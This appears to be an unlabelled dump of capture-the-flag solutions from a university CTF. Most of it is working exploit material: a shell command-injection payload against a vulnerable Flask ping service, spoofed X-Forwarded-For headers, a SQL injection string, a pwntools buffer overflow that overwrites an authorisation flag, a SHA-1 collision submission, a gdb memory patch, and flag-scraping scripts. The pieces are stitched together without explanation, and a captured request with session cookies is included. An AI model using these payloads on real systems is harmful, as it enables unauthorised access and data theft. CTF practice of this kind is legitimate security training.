127.0.0.1 | cat flag/flag.txt

  from flask import Flask, render_template, request, url_for
import subprocess

app = Flask(__name__)


@app.route('/')
def home():
    return render_template('home.html')


@app.route('/', methods=['POST'])
def webshell():
    command = request.form['command']
    if ("vi" or ">") in command:
        output = "your command is error!!!What are you trying to do!!!"
    else:
        try:
            output = subprocess.check_output("ping -c1 " + command, stderr=subprocess.STDOUT, shell=True)
            print output
        except Exception as e:
            output = "your command is error!!!What are you trying to do!!!"
    return render_template('home.html', allCarbDiet=output)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

PCFET0NUWVBFIGh0bWw+ICAgICAKPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4KPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPHA+R2V0IG1lIGEgZmlsZSBuYW1lLCBJJ2xsIHJlYWQgdGhlIGZpbGUgZm9yIHlvdSAhPC9wPgoJCTxwIHN0eWxlPSJjb2xvcjpncmF5OyI+ICogVHJ5IDEudHh0IDwvcD4KPGZvcm0gYWN0aW9uPSJpbmRleC5waHAiIG1ldGhvZD0icG9zdCI+CllvdXIgaW5wdXQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpbnB1dCIgLz4K44CAPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0i6YCB5Ye66KGo5ZauIi8+CjwvZm9ybT4KCjw/cGhwCi8vIFRoZSBmbGFnIGZvciBFWnBocCBpcyBFRU5TezNjY2JkN2I1NWU2N2EwOWJjMDg1ZTMyZjZhNzllMmNmZGZlMDNlODUyNWFlMmUyN2M5MmE2NDZjNjc5YmYwMGN9CgokaXAgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKaWYgKCRpcCA9PSAnMTI3LjAuMC4xJyl7CiAgICAvLyA1NVJmXzEKICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoImZsYWdWR2hwYzBselFVWnNZV2REWVc1dWIzUkNaVVp2ZFc1ayIpOwogICAgZWNobyAkY29udGVudDsKfQplbHNlaWYoJF9TRVJWRVJbIkhUVFBfQ0xJRU5UX0lQIl09PScxMjcuMC4wLjEnICYmICRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdID09JzEyNy4wLjAuMScpewogICAgLy8gNTVSZl8yCiAgICAkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJmbGFnU1dSdmJuUjNZVzUwZVc5MWEyNXZkdz09Iik7CiAgICBlY2hvICRjb250ZW50Owp9CmVsc2V7CiAgICAkaW5wdXQgIC49ICAkX1BPU1QgWyAnaW5wdXQnIF07CiAgICAkZmlsZW5hbWUgPSB0cmltKCRpbnB1dCk7CiAgICBpZiAoc3RycG9zKCRpbnB1dCwgJ2ZsYWcnKSAhPT0gZmFsc2UpewogICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIGVjaG8gIllvdSBhcmUgYSBiYWQgaGFja2VyICEhISI7CiAgICB9CiAgICBlbHNlewogICAgICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKTsKICAgICAgICBpZiAocHJlZ19tYXRjaCgiL2ZsYWcvaSIsICRjb250ZW50KSl7CgkJCWVjaG8gIjxicj4iOwogICAgICAgICAgICBlY2hvICJZb3UgYXJlIGEgYmFkIGhhY2tlciAhISEiOwogICAgICAgIH0KICAgICAgICBlbHNlewogICAgICAgICAgICBlY2hvICI8YnI+IjsKICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICB9CiAgICAgICAgCiAgICB9Cn0KPz4KICAgIDwvYm9keT4KCjwvaHRtbD4K

<!DOCTYPE html>     
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
    <body>
        <p>Get me a file name, I'll read the file for you !</p>
		<p style="color:gray;"> * Try 1.txt </p>
<form action="index.php" method="post">
Your input: <input type="text" name="input" />
　<input type="submit" name="送出表單"/>
</form>

<?php
// The flag for EZphp is EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}

$ip = $_SERVER["REMOTE_ADDR"];
if ($ip == '127.0.0.1'){
    // 55Rf_1
    $content = file_get_contents("flagVGhpc0lzQUZsYWdDYW5ub3RCZUZvdW5k");
    echo $content;
}
elseif($_SERVER["HTTP_CLIENT_IP"]=='127.0.0.1' && $_SERVER["HTTP_X_FORWARDED_FOR"] =='127.0.0.1'){
    // 55Rf_2
    $content = file_get_contents("flagSWRvbnR3YW50eW91a25vdw==");
    echo $content;
}
else{
    $input  .=  $_POST [ 'input' ];
    $filename = trim($input);
    if (strpos($input, 'flag') !== false){
        echo "<br>";
        echo "You are a bad hacker !!!";
    }
    else{
        $content = file_get_contents($filename);
        if (preg_match("/flag/i", $content)){
			echo "<br>";
            echo "You are a bad hacker !!!";
        }
        else{
            echo "<br>";
            echo $content;
        }
        
    }
}
?>
    </body>

</html>

X-Forwarded-For: 127.0.0.1
Client-IP: 127.0.0.1

1' or '1'='1

GET /fonts/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: eens.ee.ncku.edu.tw:5102
Accept: */*
Connection: close
Cookie: level: admin; session=0ba64634-7efd-4ee3-8052-7de342d7db3d.taDtAHyw_ixod5mf6Q7NVuWRaZg; _ga=GA1.3.666780538.1583373154; _gid=GA1.3.729447486.1584775510; s_pers=%20c19%3Dpr%253Apure%2520portal%253Apersons%253Aview%7C1584262262181%3B%20v68%3D1584260460625%7C1584262262186%3B%20v8%3D1584260581398%7C1678868581398%3B%20v8_s%3DMore%2520than%252030%2520days%7C1584262381398%3B; AMCV_4D6368F454EC41940A4C98A6%40AdobeOrg=-432600572%7CMCIDTS%7C18337%7CMCMID%7C34021734364032204804614156171821970172%7CMCAID%7CNONE%7CMCOPTOUT-1584267662s%7CNONE%7CMCAAMLH-1584865262%7C11%7CMCAAMB-1584865262%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI%7CMCSYNCSOP%7C411-18344%7CvVersion%7C4.5.2; s_fid=0B3F668660A8EC43-1554906741E9BCDC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Accept-Language: zh-tw
Referer: http://eens.ee.ncku.edu.tw:5102/
Accept-Encoding: gzip, deflate

Input first secret:
Input second secret:
Traceback (most recent call last):
  File "sha1.py", line 16, in <module>
    secret_2 = str(raw_input())
EOFError: EOF when reading a line
[21] Failed to execute script sha1

from pwn import *
import hashlib
import base64

f1 = open('shattered-1.pdf', 'rb').read()
f2 = open('shattered-2.pdf', 'rb').read()

encoder = hashlib.sha1()
encoder.update(f1)
print(encoder.digest())
encoder.update(f2)
print(encoder.digest())

conn = remote('140.116.215.203', 5001)
conn.recvline('Input first secret:')
conn.sendline(base64.b64encode(f1))
conn.recvline('Input second secret:')
conn.sendline(base64.b64encode(f2))
conn.interactive()

chiper = 'MHBFOBNMAOPSQWDVSFCUACSTBDRMOMSKGRZQHALJRNJSRRGLSREUFSLC'
key = 'IDONTTHINKYOOOOOOOUCANSLOVETHISSOJUSTGIVEUPANDTAKEABREAK'
dic = {}
base = 64

f = open('cipher.txt')

def decode(dic, c, k):
    i = dic[k].index(c)
    i += base
    return chr(i)

[print(f.readline()) for i in range(3)]

for i in range(26):
    tmp = f.readline()
    tmp = tmp.split('|')
    dic[tmp[0]] = tmp[1].replace('\n', '').split(' ')
f.close()

flag = ''
for c, k in zip(chiper, key):
    if c == '{' or c == ' ' or c == '}':
        flag += c
    else:
        flag += decode(dic, c, k)
print(flag)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char acc[10];
char pass[10];
char allow[4];

int main() {
    strcpy(allow,"no");

    FILE *fd = fopen("secret.txt", "r");
    char username[10], password[10], flag[256];

    fscanf(fd, "%s", username);
    fscanf(fd, "%s", password);
    fscanf(fd, "%s", flag);


    printf("Username: \n");
    fflush(stdout);
    scanf("%s",acc);
    fflush(stdout);
    printf("Password: \n");
    fflush(stdout);
    scanf("%s",pass);
    fflush(stdout);


    if ((!strcmp(acc, username)) && !(strcmp(pass, password)) )
		strcpy(allow, "yes");

    if (!strcmp(allow, "yes"))
		printf("Nice!\n%s\n", flag);
    else
        printf("You are bad guy so you cannot access!\n");

    fflush(stdout);
    return 0;
}

from pwn import *

conn = remote('140.116.215.203', 5201)
conn.recvline('Username:')
conn.sendline('a')
conn.recvline('Password:')
conn.sendline('b' * 10 + 'yes')
conn.interactive()

from pwn import *

def solve(q):
    q = q.replace('?', '').replace(' ', ''). replace('=', '')

    if '+' in q:
        Q = q.split('+')
        return str(int(Q[0])+int(Q[1]))
    else:
        Q = q.split('-')
        return str(int(Q[0])-int(Q[1]))
conn = remote('140.116.215.203', 5005)
for i in range(100):
    conn.recv()
    q = conn.recv().decode('utf-8').split('\n')[-2]
    conn.sendline(solve(q))
conn.interactive()

$> b main
$> info address scores
> get the address of symbol scores
$> set {int}address = 500
$> c

with open('flag.png', 'rb') as f:
    data = bytearray(f.read())
    data[2] = 0x4E
    f.close()
with open('exploit.png', 'wb') as f:
    f.write(data)
    f.close()

import os
from glob import glob

lists = ['./850+236.zip']

def cal(path):
    p = path.replace('./', '')
    q = p.split('.')[0]
    a, b = q.split('+')[0], q.split('+')[1]
    return str(int(a)+int(b))

def unzip(path):
    ans = cal(path)
    os.system(f'unzip -P {ans} {path}')
    files = glob('./*.zip')
    for f in files:
        if f not in lists:
            return f

target = './850+236.zip'
while True:
    new = unzip(target)
    lists.append(new)
    target = new

import requests

flag = []

for i in range(0, 30):
    r = requests.get(f'http://eens.ee.ncku.edu.tw:5103/search?p={i}')
    flag.append(r.headers['flag'])

print(''.join(flag))